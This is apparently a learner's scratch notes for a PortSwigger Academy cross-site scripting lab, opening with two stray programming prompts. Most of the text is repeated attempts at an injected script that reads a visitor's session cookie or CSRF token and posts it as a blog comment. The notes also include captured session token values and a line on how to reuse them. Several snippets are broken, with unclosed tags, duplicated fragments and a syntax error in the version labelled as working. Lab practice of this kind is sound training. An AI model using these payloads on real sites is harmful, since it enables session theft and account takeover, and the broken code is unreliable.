portswigger_academy


write a program that controls screen dimming

write a program that check to see if user data is validated using client side JS


# Portswigger Academy xss to steal session cookie lab

Hey guys, I'm trying to do this lab with out using burp collaborator >
https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies. 
Per the lab instructions, I am trying to write a js script that makes the
current viewer post their session cookie within a blog comment. Below you will
find the code I've tried. When the code runs it seems the lab shuts down the
ability to post any new comments. I'm guessing this is desired firewall
behavior. I'm not looking for the answer because I feel like I'm close, but if
I could just get confirmation that I'm on the right track or if I should be looking
at something else, I'd greatly appreicate it.

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/postId=3',true);
req.send();
function handleResponse() {
    var token = document.cookie
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/post/comment', true);
    changeReq.send('csrf='+token+'&postId=3')
};
</script> 


<script>
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "https://ac461f431fd3633d801d454100d20061.web-security-academy.net/post?postId=3", true); 
xhttp.onreadystatechange = function() {
   if (this.readyState == 4 && this.status == 200) {
     // Response
     var response = this.responseText;
   }
};
var data = {name:'breaker',comment: 'prueba',email: 'yogesh@makitweb.com',website:'http://hola.com'};
xhttp.send(JSON.stringify(data));

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", '/post/comment', true);

//Send the proper header information along with the request
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xhr.onreadystatechange = function() { // Call a function when the state changes.
    if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
        // Request finished. Do processing here.
    }
}
xhr.send("foo=bar&lorem=ipsum");
// xhr.send(new Int8Array()); 
// xhr.send(document);

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/post?postId=3',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/post/comment', true);
    changeReq.send('comment='+token+'&email=test@test.com')
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/post?postId=3',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/post/comment', true);
    changeReq.send('comment='+token+'&email=test@test.com')
};
</script>

 
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/post?postId=3',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/post/comment', true);
    changeReq.send('postId=3&comment='+token+'&name=hola&email=test%40test.com&website=http%3A%2F%2Ftest.com')

};
</script>

req.onload = handleResponse;
req.open('get','/post?postId=4',true);
req.send();
function handleResponse() {
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/post/comment', true);
    changeReq.send('csrf=uFGWyxZvsn435JcdiQRMNKs7G6CVxWhD&postId=4&comment='+document.cookie+'&name=hola&email=test@test.com&website=http://test.com')

};
</script>
payload for when you have session cookie is session=*first csrf token*;
session=*2nd for posted csrf token*

session=T4vmpuqH2iAXCR1Ak0Lf9fXFhuk3nMtp; session=e6u1so6ybNdumF4KQrjTyguozi5HABhg


### this works
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/post?postId=4',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];

    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/post/comment', true);
    changeReq.send('csrf=uFGWyxZvsn435JcdiQRMNKs7G6CVxWhD&postId=4&comment='+token)+'&name=hola&email=test@test.com&website=http://test.com')

};
</script>

